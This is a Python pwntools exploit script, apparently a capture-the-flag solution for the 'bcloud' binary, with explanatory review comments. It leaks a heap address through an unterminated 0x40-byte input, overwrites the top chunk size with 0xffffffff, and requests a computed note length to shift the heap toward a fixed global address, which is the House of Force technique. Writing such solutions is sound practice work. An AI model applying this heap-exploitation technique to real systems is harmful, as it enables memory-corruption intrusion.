#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'  # NOTE(review): the conventional module metadata name is __author__; kept as-is since other tooling may read this spelling
from pwn import *
from time import sleep
import os
import sys
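elfPath = "./bcloud"
libcPath = ""
remoteAddr = "localhost"
remotePort = 9999

context.binary = elfPath
context.terminal = ["deepin-terminal", "-x", "sh", "-c"]
elf = context.binary

# Run mode is taken from the first CLI argument:
#   "l"           -> local process, debug-level logging, libc taken from the ELF
#   "d"           -> remote to localhost:9999, info-level logging
#   anything else -> remote to remoteAddr:remotePort, info-level logging
# The original indexed sys.argv[1] unconditionally and died with an
# IndexError when started without a mode; report usage instead.
if len(sys.argv) < 2:
    sys.exit("usage: {} <l|d|r>".format(sys.argv[0]))
mode = sys.argv[1]

if mode == "l":
    context.log_level = "debug"
    io = process(elfPath)
    libc = elf.libc
else:
    context.log_level = "info"
    if mode == "d":
        io = remote("localhost", 9999)
    else:
        io = remote(remoteAddr, remotePort)
    # For remote runs libc is only resolved when a path is configured;
    # otherwise the name stays undefined (the __main__ block below never
    # reads it, so this is harmless there).
    if libcPath:
        libc = ELF(libcPath)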
def success(name, value):
    """Log *value* as a hex number labelled *name* through pwntools' success logger.

    Shadows the ``success`` exported by ``from pwn import *`` on purpose so
    the rest of the script can call ``success("label", addr)`` directly.
    """
    return log.success("{} -> {:#x}".format(name, value))
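def DEBUG(bps=None, pie=False):
    """Attach gdb to the running target, optionally with breakpoints set.

    Args:
        bps: list of breakpoint addresses.  For ``pie=True`` they are
            treated as offsets and the mapped base is added.  ``None`` means
            no breakpoints; the original used a shared mutable ``[]`` default.
        pie: when true, read the load base from ``pmap`` of the target's pid
            before translating ``bps``.

    Blocks on ``raw_input`` so the user can confirm before gdb attaches.
    Only meaningful when ``io`` is a local process.
    """
    bps = [] if bps is None else bps
    if pie:
        # Line index 1 of `pmap <pid>` is the first mapping after the
        # header; its first column is taken as the load base.
        # NOTE(review): assumes that first mapping is the main binary —
        # confirm for this target.
        with os.popen("pmap {}| awk '{{print $1}}'".format(pidof(io)[0])) as pm:
            base = int(pm.readlines()[1], 16)
    else:
        base = 0
    cmd = ''.join('b *{:#x}\n'.format(b + base) for b in bps)
    # Only auto-continue when there is at least one breakpoint to stop at.
    if bps:
        cmd += "c"
    raw_input("DEBUG: ")
    gdb.attach(io, cmd)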
def newNote(length, cont):
    """Answer one round of the service's menu: pick "1" at the ``>>`` prompt
    (presumably the new-note option), then supply *length* and *cont* at the
    two following ``:`` prompts.  *cont* is sent without a trailing newline.
    """
    steps = (
        (io.sendlineafter, ">>\n", "1"),
        (io.sendlineafter, ":\n", str(length)),
        (io.sendafter, ":\n", cont),
    )
    for send, delim, payload in steps:
        send(delim, payload)
if __name__ == "__main__":
    # DEBUG([0x8048A19])
    # First prompt: 0x40 filler bytes with no terminator.  The service
    # echoes the field back and the 4 bytes that follow it are decoded as
    # a heap pointer; 0x8 is the offset from that pointer to the heap base
    # the rest of the script works from.
    # NOTE(review): this relies on the service echoing past the 0x40 bytes
    # written — confirm against the binary.
    io.sendafter(":\n", 'a' * 0x40)
    io.recvuntil('a' * 0x40)
    heapBase = u32(io.recv(4)) - 0x8
    success("heapBase", heapBase)
    # Second and third prompts: the third answer begins with 0xffffffff, so
    # the first 4-byte field of that buffer ends up all-ones.  Which field
    # that is (presumably a chunk size header) is not visible here.
    io.sendafter(":\n", 'b' * 0x40)
    io.sendafter(":\n", p32(0xffffffff) + 'c' * (0x40 - 4))
    # Unconditional interactive gdb attach at a fixed address.  It blocks
    # on raw_input and only makes sense for the local ("l") mode; comment
    # it out for unattended or remote runs.
    DEBUG([0x8048A19])
    # Top chunk is assumed to sit at a fixed 0xd8 past the leaked base;
    # this and the absolute addresses below (0x804b120, 0x8048A19) tie the
    # script to one specific non-PIE build of ./bcloud.
    topChunk = heapBase + 0xd8
    success("topChunk", topChunk)
    # The requested note length is derived from topChunk and the fixed
    # address 0x804b120 (minus 8); the script then hands the session to the
    # user rather than finishing automatically.
    newNote(topChunk - 0x804b120 - 8, 'dddd\n')
    newNote(0x10, 'eeee\n')
    io.interactive()
    io.close()